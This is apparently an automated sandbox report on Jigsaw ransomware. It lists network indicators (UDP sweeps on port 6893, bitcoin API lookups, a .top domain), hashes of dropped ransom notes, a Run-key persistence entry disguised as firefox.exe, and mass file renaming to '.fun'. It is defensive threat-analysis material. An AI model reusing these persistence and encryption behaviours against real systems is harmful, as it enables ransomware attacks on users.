FR 178.33.162.251:6893 udp
FR 178.33.162.252:6893 udp
FR 178.33.162.253:6893 udp
FR 178.33.162.254:6893 udp
FR 178.33.162.255:6893 udp
FR 178.33.163.0:6893 udp
FR 178.33.163.1:6893 udp
FR 178.33.163.2:6893 udp
FR 178.33.163.3:6893 udp
FR 178.33.163.4:6893 udp
FR 178.33.163.5:6893 udp
FR 178.33.163.6:6893 udp
FR 178.33.163.7:6893 udp
FR 178.33.163.8:6893 udp
FR 178.33.163.9:6893 udp
FR 178.33.163.10:6893 udp
FR 178.33.163.11:6893 udp
FR 178.33.163.12:6893 udp
FR 178.33.163.13:6893 udp
FR 178.33.163.14:6893 udp
FR 178.33.163.15:6893 udp
FR 178.33.163.16:6893 udp
FR 178.33.163.17:6893 udp
FR 178.33.163.18:6893 udp
FR 178.33.163.19:6893 udp
FR 178.33.163.20:6893 udp
FR 178.33.163.21:6893 udp
FR 178.33.163.22:6893 udp
FR 178.33.163.23:6893 udp
FR 178.33.163.24:6893 udp
FR 178.33.163.25:6893 udp
FR 178.33.163.26:6893 udp
FR 178.33.163.27:6893 udp
FR 178.33.163.28:6893 udp
FR 178.33.163.29:6893 udp
FR 178.33.163.30:6893 udp
FR 178.33.163.31:6893 udp
FR 178.33.163.32:6893 udp
FR 178.33.163.33:6893 udp
FR 178.33.163.34:6893 udp
FR 178.33.163.35:6893 udp
FR 178.33.163.36:6893 udp
FR 178.33.163.37:6893 udp
FR 178.33.163.38:6893 udp
FR 178.33.163.39:6893 udp
FR 178.33.163.40:6893 udp
FR 178.33.163.41:6893 udp
FR 178.33.163.42:6893 udp
FR 178.33.163.43:6893 udp
FR 178.33.163.44:6893 udp
FR 178.33.163.45:6893 udp
FR 178.33.163.46:6893 udp
FR 178.33.163.47:6893 udp
FR 178.33.163.48:6893 udp
FR 178.33.163.49:6893 udp
FR 178.33.163.50:6893 udp
FR 178.33.163.51:6893 udp
FR 178.33.163.52:6893 udp
FR 178.33.163.53:6893 udp
FR 178.33.163.54:6893 udp
FR 178.33.163.55:6893 udp
FR 178.33.163.56:6893 udp
FR 178.33.163.57:6893 udp
FR 178.33.163.58:6893 udp
FR 178.33.163.59:6893 udp
FR 178.33.163.60:6893 udp
FR 178.33.163.61:6893 udp
FR 178.33.163.62:6893 udp
FR 178.33.163.63:6893 udp
FR 178.33.163.64:6893 udp
FR 178.33.163.65:6893 udp
FR 178.33.163.66:6893 udp
FR 178.33.163.67:6893 udp
FR 178.33.163.68:6893 udp
FR 178.33.163.69:6893 udp
FR 178.33.163.70:6893 udp
FR 178.33.163.71:6893 udp
FR 178.33.163.72:6893 udp
FR 178.33.163.73:6893 udp
FR 178.33.163.74:6893 udp
FR 178.33.163.75:6893 udp
FR 178.33.163.76:6893 udp
FR 178.33.163.77:6893 udp
FR 178.33.163.78:6893 udp
FR 178.33.163.79:6893 udp
FR 178.33.163.80:6893 udp
FR 178.33.163.81:6893 udp
FR 178.33.163.82:6893 udp
FR 178.33.163.83:6893 udp
FR 178.33.163.84:6893 udp
FR 178.33.163.85:6893 udp
FR 178.33.163.86:6893 udp
FR 178.33.163.87:6893 udp
FR 178.33.163.88:6893 udp
FR 178.33.163.89:6893 udp
FR 178.33.163.90:6893 udp
FR 178.33.163.91:6893 udp
FR 178.33.163.92:6893 udp
FR 178.33.163.93:6893 udp
FR 178.33.163.94:6893 udp
FR 178.33.163.95:6893 udp
FR 178.33.163.96:6893 udp
FR 178.33.163.97:6893 udp
FR 178.33.163.98:6893 udp
FR 178.33.163.99:6893 udp
FR 178.33.163.100:6893 udp
FR 178.33.163.101:6893 udp
FR 178.33.163.102:6893 udp
FR 178.33.163.103:6893 udp
FR 178.33.163.104:6893 udp
FR 178.33.163.105:6893 udp
FR 178.33.163.106:6893 udp
FR 178.33.163.107:6893 udp
FR 178.33.163.108:6893 udp
FR 178.33.163.109:6893 udp
FR 178.33.163.110:6893 udp
FR 178.33.163.111:6893 udp
FR 178.33.163.112:6893 udp
FR 178.33.163.113:6893 udp
FR 178.33.163.114:6893 udp
FR 178.33.163.115:6893 udp
FR 178.33.163.116:6893 udp
FR 178.33.163.117:6893 udp
FR 178.33.163.118:6893 udp
FR 178.33.163.119:6893 udp
FR 178.33.163.120:6893 udp
FR 178.33.163.121:6893 udp
FR 178.33.163.122:6893 udp
FR 178.33.163.123:6893 udp
FR 178.33.163.124:6893 udp
FR 178.33.163.125:6893 udp
FR 178.33.163.126:6893 udp
FR 178.33.163.127:6893 udp
FR 178.33.163.128:6893 udp
FR 178.33.163.129:6893 udp
FR 178.33.163.130:6893 udp
FR 178.33.163.131:6893 udp
FR 178.33.163.132:6893 udp
FR 178.33.163.133:6893 udp
FR 178.33.163.134:6893 udp
FR 178.33.163.135:6893 udp
FR 178.33.163.136:6893 udp
FR 178.33.163.137:6893 udp
FR 178.33.163.138:6893 udp
FR 178.33.163.139:6893 udp
FR 178.33.163.140:6893 udp
FR 178.33.163.141:6893 udp
FR 178.33.163.142:6893 udp
FR 178.33.163.143:6893 udp
FR 178.33.163.144:6893 udp
FR 178.33.163.145:6893 udp
FR 178.33.163.146:6893 udp
FR 178.33.163.147:6893 udp
FR 178.33.163.148:6893 udp
FR 178.33.163.149:6893 udp
FR 178.33.163.150:6893 udp
FR 178.33.163.151:6893 udp
FR 178.33.163.152:6893 udp
FR 178.33.163.153:6893 udp
FR 178.33.163.154:6893 udp
FR 178.33.163.155:6893 udp
FR 178.33.163.156:6893 udp
FR 178.33.163.157:6893 udp
FR 178.33.163.158:6893 udp
FR 178.33.163.159:6893 udp
FR 178.33.163.160:6893 udp
FR 178.33.163.161:6893 udp
FR 178.33.163.162:6893 udp
FR 178.33.163.163:6893 udp
FR 178.33.163.164:6893 udp
FR 178.33.163.165:6893 udp
FR 178.33.163.166:6893 udp
FR 178.33.163.167:6893 udp
FR 178.33.163.168:6893 udp
FR 178.33.163.169:6893 udp
FR 178.33.163.170:6893 udp
FR 178.33.163.171:6893 udp
FR 178.33.163.172:6893 udp
FR 178.33.163.173:6893 udp
FR 178.33.163.174:6893 udp
FR 178.33.163.175:6893 udp
FR 178.33.163.176:6893 udp
FR 178.33.163.177:6893 udp
FR 178.33.163.178:6893 udp
FR 178.33.163.179:6893 udp
FR 178.33.163.180:6893 udp
FR 178.33.163.181:6893 udp
FR 178.33.163.182:6893 udp
FR 178.33.163.183:6893 udp
FR 178.33.163.184:6893 udp
FR 178.33.163.185:6893 udp
FR 178.33.163.186:6893 udp
FR 178.33.163.187:6893 udp
FR 178.33.163.188:6893 udp
FR 178.33.163.189:6893 udp
FR 178.33.163.190:6893 udp
FR 178.33.163.191:6893 udp
FR 178.33.163.192:6893 udp
FR 178.33.163.193:6893 udp
FR 178.33.163.194:6893 udp
FR 178.33.163.195:6893 udp
FR 178.33.163.196:6893 udp
FR 178.33.163.197:6893 udp
FR 178.33.163.198:6893 udp
FR 178.33.163.199:6893 udp
FR 178.33.163.200:6893 udp
FR 178.33.163.201:6893 udp
FR 178.33.163.202:6893 udp
FR 178.33.163.203:6893 udp
FR 178.33.163.204:6893 udp
FR 178.33.163.205:6893 udp
FR 178.33.163.206:6893 udp
FR 178.33.163.207:6893 udp
FR 178.33.163.208:6893 udp
FR 178.33.163.209:6893 udp
FR 178.33.163.210:6893 udp
FR 178.33.163.211:6893 udp
FR 178.33.163.212:6893 udp
FR 178.33.163.213:6893 udp
FR 178.33.163.214:6893 udp
FR 178.33.163.215:6893 udp
FR 178.33.163.216:6893 udp
FR 178.33.163.217:6893 udp
FR 178.33.163.218:6893 udp
FR 178.33.163.219:6893 udp
FR 178.33.163.220:6893 udp
FR 178.33.163.221:6893 udp
FR 178.33.163.222:6893 udp
FR 178.33.163.223:6893 udp
FR 178.33.163.224:6893 udp
FR 178.33.163.225:6893 udp
FR 178.33.163.226:6893 udp
FR 178.33.163.227:6893 udp
FR 178.33.163.228:6893 udp
FR 178.33.163.229:6893 udp
FR 178.33.163.230:6893 udp
FR 178.33.163.231:6893 udp
FR 178.33.163.232:6893 udp
FR 178.33.163.233:6893 udp
FR 178.33.163.234:6893 udp
FR 178.33.163.235:6893 udp
FR 178.33.163.236:6893 udp
FR 178.33.163.237:6893 udp
FR 178.33.163.238:6893 udp
FR 178.33.163.239:6893 udp
FR 178.33.163.240:6893 udp
FR 178.33.163.241:6893 udp
FR 178.33.163.242:6893 udp
FR 178.33.163.243:6893 udp
FR 178.33.163.244:6893 udp
FR 178.33.163.245:6893 udp
FR 178.33.163.246:6893 udp
FR 178.33.163.247:6893 udp
FR 178.33.163.248:6893 udp
FR 178.33.163.249:6893 udp
FR 178.33.163.250:6893 udp
FR 178.33.163.251:6893 udp
FR 178.33.163.252:6893 udp
FR 178.33.163.253:6893 udp
FR 178.33.163.254:6893 udp
FR 178.33.163.255:6893 udp
US 8.8.8.8:53 api.blockcypher.com udp
US 104.20.99.10:80 api.blockcypher.com tcp
US 8.8.8.8:53 btc.blockr.io udp
US 8.8.8.8:53 bitaps.com udp
NL 178.128.255.179:443 bitaps.com tcp
US 8.8.8.8:53 chain.so udp
US 172.67.40.90:443 chain.so tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 p27dokhpz2n7nvgr.12hygy.top udp
US 8.8.8.8:53 p27dokhpz2n7nvgr.12hygy.top udp
US 8.8.8.8:53 crl.microsoft.com udp
GB 88.221.134.83:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 184.25.193.234:80 www.microsoft.com tcp

Files

memory/2856-0-0x0000000000220000-0x0000000000251000-memory.dmp

memory/2856-1-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2856-2-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2856-5-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2856-9-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2856-48-0x0000000000400000-0x0000000000435000-memory.dmp

C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___75WVLOZ_.hta

MD5 d5791064a756a563d36675d9018c8b37
SHA1 cfcc3520c34f2d6b2ffa0c2e18232a703c857718
SHA256 76fef31abd1a3d2173e1015f02717890681238e9f955787c5ea93ae9022b4b42
SHA512 f701eff8066781904203e294ee6c37dfcd2d120539ee5a1a2c204dfb134c276b88e43483a6e566bf6d1246ac88ec9d2634cd7da655d552ac44cac7d2a62b09e9

C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___CXIFPVMR_.txt

MD5 9be9af5fc5859149ce42464b4d60551a
SHA1 52ca768486b1e3ee6acfbbe4534b20f4555ce30b
SHA256 071195840ee87b148a23049d93570807b72932dbe0cecb49a1f0a510c3a30f95
SHA512 9499ee236a01935aff0abfb5dc959c9d2cbe698f5f68c992d3fd1dec659b66297b899aa25d5f5f0e12226bcee3ca217a1cf7d119fa6bb48fa3b589eec6ccdc5c

memory/2856-72-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2856-89-0x0000000000400000-0x0000000000435000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab982C.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar983F.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f17343e305d560e269f0a75584c431fb
SHA1 3819fd3e2d55e840b2550c11f7fa4890edb7758c
SHA256 d5758c7aae8df64a13488a8229075d7d0fb373469401f93eacf05413aa6e2c8d
SHA512 af6f7ff4de61e50d0d81b6c13b0e8d6c03e51d49032c9e2f9c7c60418e459c960cace3971206c74c502ccf47af2e85ac415f4351cf9328d3db2d19cf4b3ceb22

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 118dd7c1851cddc2f54656ff9c86c76b
SHA1 d0993c1a8df10aaa6e466da72f391941e5ddbcb9
SHA256 1e603c27e4a5c1b0c7c5422570317a2bb0cc1ec49f09d635ff194a2858966fc1
SHA512 eca5ecb0ead0a9d6a0a0359d3c6e1257cd5ccea2536f53275ca75e836d8e616eacb127a650c1f9f06a7c9a8fc542659d3e25f4ac99e7962916c81746e33eab91

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 94a61eb3ea57bac14d93b896e8e71352
SHA1 588c02ae11215d52f964667a900963d946768f8f
SHA256 4aca5cee9dc2ad3298f280ff7f818c30bf1628b0bdfb205f747e76673aa9cb39
SHA512 157c73e663f9fbf4ba93107f743c66828020c94f8028e61f3315db3f1e490b2929aabd92bbc496182da59344f320227b4052df7445762f37e4136c5cf62e61fb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e367fb2366f0022e46a11f91b0183c48
SHA1 77e45c3d4fabb032cf8f2bc1bf09a69a7e3ae193
SHA256 e5e681ab6ac93f50ec8c0789888e37ea474c6dd9a6e475fa95d6649981f06618
SHA512 735305dc6a26c33bf1e0598af370c4c004b59f417ac64481c38ab49fdd08e6dc98ac40b0e2a694644124366e3ca6215aa7493372a499b248be154c9a7e651e1d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 00e8a2b076e55ceba8027320b9b94ea6
SHA1 8b72c705abb4e5443dc4c88cf52443b0c3a7fa3d
SHA256 fa010ca070681ad0318beb0cd7d218232df59bcfec0cdac8fa11311ab2da0817
SHA512 ddebb9a14d70b20fc8fa40c0974b13084bbed784fbe8254347809be64a1e21f5485f1eb336db8e494260131f263760044987859df2bcf74a0a891e8e0dfcb5a9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0f764dab30698f8afa94c52c93fc5a5e
SHA1 6480fe0ef7830f3ac67391a3bb1b17fd0ce12eef
SHA256 cf9bb3e012d54e45858239c657482f7b394ab4c56c7122013b93d50e6620168e
SHA512 e1e87e9c346c250d3195cefea932f6153141a6d6326157283b8ad45a508ed3e9432acfc8e6f740b623fddc9732e80a370c6ca0b0414aab99a31cfced95f5ed48

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3ca8982e75c334d14e0fca74ff690080
SHA1 9fdae0e82daaf0dcbbf0861df08eff74301f3ba7
SHA256 900b2a3dac826b4a97760db6c859230d43fe849f744bec45ce877db436b3a50a
SHA512 b2adb041d208934e7f600d500754031310c3403a8e93262f015789350d4c69a6b01d4e302d33f3d0e013b3459cd37f9c44efef92140e8e8b5ead44f7eebe8fa5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0de72c1290c5b9d0fe1b32fe811c5705
SHA1 de277f5426b1d5940d72670c1e8a89be31bc11b4
SHA256 b2aa4efa1ea6eb71c894bdb118ee2f05b8f5823985167e5b42050cd3c6bc02de
SHA512 07c32d3d7faa5e00edfda2bcf46adecbffa23b8b14f4d662e3c0f4d77e3dcb85569d030204c01a8988e09f5f29b57fad423044af7d1d9d7d0327d86916a50ec5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2fc6aaea1b993ea49e3461fa9fca6ff9
SHA1 dcf09801d0b0dad83ec06486ce47c2e3b9409f65
SHA256 2267a0227a1566f00af01a9dae8ded66f5059de3ec0917c8e6846222778e201d
SHA512 495edaa81b5223c045f0fdee8d02fdcc46c978a6b8717a35c553d3f6d3b61c469fa611745e0d945b92e67a728fc3b900f24034e8fc0e863056af83b41ddb0388

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ab2605a431b118a8f43904653d3c921e
SHA1 010c6dfaa8adc1b8f2711ce379063d95139d13e6
SHA256 ff8737a457b2a0ba4040a71b0b15b345c2fbc5e92fb5402ac27a88e0dd3e40ae
SHA512 968af762b462b09c143b404ecd2f6c74a28e31a63da586a024f836d2793fd0e699181b9aa180f6bc3b4c0f09fd2641cc68cada6c161584a5d40a90ac012f3e64

C:\Users\Admin\AppData\Local\Temp\~DF5F72849F0C42E09F.TMP

MD5 93dc455d219cd8cfad0590ac4c9c6119
SHA1 8b201e2effe811c03f4c8e23942725de12a001cf
SHA256 1499fe469a0ab3edd3ad0f65060ca41e567ad12943f1957ce09af00b87cf8740
SHA512 01f9bb499f2df83a80833ac6305fcaebe6205be896b8f380d514fb28c342ff57f6510e80922ae9d37216a259d70b71ffb54f5e9b3371c62805cf9b313cf10911

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-26 15:24

Reported

2024-11-26 15:25

Platform

win10v2004-20241007-en

Max time kernel

63s

Max time network

64s

Command Line

"C:\Users\Admin\AppData\Local\Temp\jigsaw.exe"

Signatures

Jigsaw Ransomware

ransomware jigsaw

Jigsaw family

jigsaw

Renames multiple (3763) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\jigsaw.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Local\Temp\jigsaw.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-72_altform-lightunplated.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Images\SkypeAppList.scale-200_contrast-black.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\LinkedInboxLargeTile.scale-400.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.scale-100.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Unlock.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-60.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\SmallTile.scale-200.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\SearchEmail.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\ui-strings.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\word.x-none.msi.16.x-none.boot.tree.dat C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSplashLogo.scale-300.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipschs.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedAppList.scale-200_contrast-white.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\AppPackageLargeTile.scale-125_contrast-white.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\ui-strings.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\ui-strings.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\delete.svg.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner.gif.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_pt_135x40.svg C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\people\rachelVaughan.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\CardUIBkg.scale-200.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\affDescription.txt.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\nl.txt C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\Weather_TileMediumSquare.scale-200.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\themes\dark\file_icons.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\ui-strings.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\nub.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\ui-strings.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ca.txt C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-24_altform-unplated.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\OrientationSensorCalibrationFigure.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_share_18.svg C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubSplashWideTile.scale-125_contrast-black.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\onboarding\notifications_emptystate_v3.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\core_icons.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\Timer3Sec.targetsize-20.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteAppList.scale-125.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\contrast-black\MixedRealityPortalAppList.targetsize-32_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.scale-100.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreSmallTile.scale-200.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME.txt C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Google.scale-125.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red Orange.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\ui-strings.js C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\Movie-TVStoreLogo.scale-125_contrast-white.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon.png.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\ui-strings.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nb-no\ui-strings.js.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
